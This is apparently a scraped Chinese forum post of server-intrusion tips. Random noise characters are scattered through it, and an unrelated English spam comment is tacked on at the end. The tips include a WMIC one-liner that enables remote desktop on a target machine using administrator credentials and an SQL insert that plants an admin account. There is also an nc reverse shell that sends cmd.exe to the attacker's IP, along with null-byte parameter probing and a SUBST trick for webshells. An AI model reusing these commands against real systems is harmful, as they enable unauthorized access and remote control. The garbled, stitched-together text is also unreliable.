p$ W4 o% W+ A0 `8 K2 M- Q(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor - |6 a' Z! |2 f$ B9 `( W8 TAutoRun ! G. s3 N; P+ l) w 8 G# k7 {3 l( R8 l% o# }# A' v. ?3 ~0 u2 c7 c
在找注入时搜索Hidden,把他改成test* @# }4 J. e9 ]/ y9 d
6 V4 `- _3 L: ]$ g' e% D0 }! a, d: s
4 W# y; L0 B, j
/ R/ x7 n' N* n. Bmstsc /v:IP /console . u: C7 N0 V$ A9 U3 S) _) O$ c 5 @! A- T3 ^2 V- d2 P& s. T O; a) J: _# A, M
一句话开3389: ; p9 M# D r0 a : e4 H. g. r7 p8 x; X/ n. F; E最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH> 9 V. A$ S6 l# d1 F( M( b; w开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1 就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.' v5 ]0 u1 j8 S( `+ [& ^
8 I9 ?$ Y6 K s5 c# u; X2 D 1 j3 \. v1 k$ F( a: T( Z知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下: ( r2 f/ b3 l' RInsert into admin(user,pwd) values('test','test')1 ?% }9 M8 l8 G9 l7 F0 Y; D
4 s3 o1 {8 N9 @7 ~7 ^$ K
; y4 G6 H( m5 a, V3 m) ` Y
NC反弹 4 i2 O2 P0 x8 C先在本机执行: nc -vv -lp 监听的端口 (自己执行) 9 @* q4 y# x5 [: _然后在服务器上执行: nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)3 G; B8 p) r0 J- p* M6 k( o- e
& J/ B+ F0 t2 y# i) j w2 L- C6 M# l" V e
在脚本入侵过程中要经常常试用%00来确认下参数是否有问题 3 \0 k$ |. d/ ?- K 3 P3 V6 E+ A6 p# V, o5 ]) J有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录- _( `0 b1 |; v. S! I7 b' F
例如: & z% X* |4 K" W* g% c, {& j8 G! xsubst k: d:\www\ 用d盘www目录替代k盘. W4 Q8 p. @ |7 ~- t% p9 s
subst k: /d 解除K盘代替作者: 匿名 时间: 2017-12-20 02:36
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta